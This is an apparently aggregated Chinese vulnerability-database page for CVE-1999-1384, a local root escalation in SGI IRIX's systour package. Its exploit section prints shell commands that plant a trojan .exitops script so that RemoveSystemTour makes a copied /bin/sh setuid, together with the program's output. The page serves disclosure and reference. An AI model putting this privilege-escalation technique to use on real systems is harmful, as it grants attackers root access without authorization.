IRIX SGI系统tour数据包(systour) Indigo Magic System Tour权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105265 漏洞类型 未知
发布时间 1996-10-30 更新时间 2005-05-02
CVE编号 CVE-1999-1384 CNNVD-ID CNNVD-199610-009
漏洞平台 IRIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19356
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199610-009
|漏洞详情
IRIX5.x至6.3版本的SGI系统tour数据包(systour)中的IndigoMagicSystemTour存在漏洞。本地用户可以借助一个Trojanhorse.exitops程序获取根权限,该程序由RemoveSystemTour程序执行的inst命令请求运行。
|漏洞EXP
source: http://www.securityfocus.com/bid/470/info

A vulnerability exists in both the Systour and OutOfBox susbsystems included with new installs of IRIX 5.x and 6.x from SGI. This vulnerability allows users on the system to run arbitrary commands as root. 

$ rbase=$HOME; export rbase
$ mkdir -p $HOME/var/inst
$ echo "dryrun: true" > $HOME/.swmgrrc
$ cp -p /bin/sh /tmp/foobar
$ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
$ chmod a+x $HOME/var/inst/.exitops
$ /usr/lib/tour/bin/RemoveSystemTour
Executing outstanding exit-commands from previous session ..
Successfully completed exit-commands from previous session.
Reading installation history
Checking dependencies
ERROR : Software Manager: automatic installation failed: New
target (nothing installed) and no distribution.
|参考资料

来源:USGovernmentResource:AA-96.08
名称:AA-96.08
链接:ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-96.08.SGI.systour.vul
来源:BID
名称:470
链接:http://www.securityfocus.com/bid/470
来源:BUGTRAQ
名称:19961030(Another)vulnerabilityinnewSGIs
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=87602167420095&w=2
来源:SGI
名称:19961101-01-I
链接:ftp://patches.sgi.com/support/free/security/advisories/19961101-01-I
来源:XF
名称:irix-systour(7456)
链接:http://www.iss.net/security_center/static/7456.php